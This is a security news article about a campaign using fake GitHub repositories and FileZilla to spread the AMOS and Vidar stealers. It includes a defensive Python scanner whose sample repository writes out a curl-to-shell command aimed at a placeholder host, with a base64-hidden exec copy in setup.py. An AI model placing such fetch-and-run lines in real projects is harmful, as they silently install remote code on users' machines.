
Hackers Exploited GitHub and FileZilla to Deliver Banking Malware

The Insikt Group at Recorded Future has found a sophisticated cybercrime operation run by Russian-speaking threat actors from the Commonwealth of Independent States (CIS).

This group has abused trusted platforms such as GitHub and FileZilla to distribute banking malware, posing a serious risk to both personal and business security.

GitCaught: Exposing the Misuse of GitHub in Cyberattacks

The people behind this campaign are highly skilled, with a deep understanding of how software is built and distributed and of how to keep users trusting what they download.


They created fake GitHub accounts and repositories that resembled real software programs, such as Pixelmator Pro, 1Password, and Bartender 5.

These fake versions were filled with malware, such as the Atomic MacOS Stealer (AMOS) and Vidar, meant to access users’ computers and steal private information.

The Insikt Group at Recorded Future determined through its research that these malware families were not separate incidents.

Instead, they shared the same command-and-control (C2) infrastructure, which indicates that the operators worked together to make the attacks more effective.

This shared C2 setup makes it look like the threat actors are part of a well-organized group with a lot of money that can start long-lasting cyberattacks on various devices and operating systems.

The constantly changing nature of these malware families makes them very hard for standard security measures to catch.

Because malicious software keeps getting more sophisticated and complex, cybersecurity needs to be proactive and flexible.

Organizations are advised to follow strict security rules, especially when bringing code from outside into their own environments.

Setting up a code review process for the whole company and using automated scanning tools like GitGuardian, Checkmarx, or GitHub Advanced Security can help find malware or strange patterns in the code.
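As an added illustration of the kind of automated check described above (example code written for this article, not the tooling of Recorded Future or of any of the scanners named here), the following Python script shows how a review pipeline could flag suspicious patterns in files pulled from a third-party repository: remote scripts piped straight into a shell, eval/exec of decoded data, and base64 blobs whose decoded content trips one of those rules. The repository contents and the hostname example.invalid are constructed placeholders.

```python
"""Heuristic pre-merge scanner for third-party code (added example, not a product)."""
import base64
import re
from typing import Dict, List, Optional

# Patterns a human reviewer should look at. These are review triggers, not proof of malice.
RULES = {
    "remote-script-to-shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    "dynamic-eval-of-decoded-data": re.compile(r"\b(eval|exec)\s*\(\s*(base64|b64decode|atob)"),
}
# Long base64-looking runs; only reported when the decoded text itself matches a rule above.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_if_text(blob: str) -> Optional[str]:
    """Return the decoded string if blob is valid base64 of printable ASCII text, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)  # binascii.Error is a ValueError subclass
    except ValueError:
        return None
    if not raw or any(b > 126 or (b < 32 and b not in (9, 10, 13)) for b in raw):
        return None
    return raw.decode("ascii")


def _finding(path: str, lineno: int, rule: str, snippet: str) -> dict:
    return {"path": path, "line": lineno, "rule": rule, "snippet": snippet.strip()[:80]}


def scan_text(path: str, text: str) -> List[dict]:
    """Scan one file's contents line by line and return a list of findings."""
    findings: List[dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append(_finding(path, lineno, name, line))
        # Decode embedded base64 and re-apply the rules to what it hides.
        for match in BASE64_BLOB.finditer(line):
            decoded = decode_if_text(match.group(0))
            if decoded is None:
                continue
            for name, pattern in RULES.items():
                if pattern.search(decoded):
                    findings.append(_finding(path, lineno, "base64-encoded-" + name, decoded))
    return findings


def scan_repo(files: Dict[str, str]) -> List[dict]:
    """Scan an in-memory mapping of path -> contents (stands in for a checked-out repo)."""
    findings: List[dict] = []
    for path in sorted(files):
        findings.extend(scan_text(path, files[path]))
    return findings


# Constructed sample repository: one clean module, one installer that pipes a remote
# script into sh, and a setup.py that hides the same kind of command behind base64.
ENCODED_COMMAND = base64.b64encode(b"curl -fsSL http://example.invalid/p.sh | sh").decode("ascii")
SAMPLE_REPO: Dict[str, str] = {
    "README.md": "# Unofficial build\nRun install.sh after cloning.\n",
    "install.sh": "#!/bin/sh\ncurl -fsSL http://example.invalid/setup.sh | sh\n",
    "setup.py": "import base64\nexec(base64.b64decode('" + ENCODED_COMMAND + "'))\n",
    "src/util.py": "def add(a, b):\n    return a + b\n",
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"{f['path']}:{f['line']} [{f['rule']}] {f['snippet']}")
```

In a real pipeline the mapping would be built from a checkout of the pull request, and findings would block the merge until a reviewer has looked at each one; the rules here are deliberately narrow so that the output stays small enough to be read by a person.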

FileZilla: Another Vector for Malware Distribution

Alongside GitHub, the threat actors have also used FileZilla, a popular FTP client, to distribute their malicious payloads.

Cybercriminals have been able to stage cyberattacks that steal personal information with shocking ease by using well-known internet services.

The complexity of the operation and the fact that new malware is always being made show how important it is to take a multi-layered approach to cybersecurity.

In the medium term, businesses should improve their overall security posture by devising ways to monitor and block unauthorized third-party programs and scripts that could be used to spread malware.

It’s also important to share information and collaborate with the larger cybersecurity community to fight complex campaigns like the one this study found.

The findings from Recorded Future's Insikt Group show the importance of staying alert and acting quickly as online threats change.

Cybercriminals still use trusted platforms to spread malware, so businesses must stay alert and use full security plans to keep their systems and data safe.

To get a full report as a PDF file with more information and a more in-depth study, click here.


Dhivya

Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
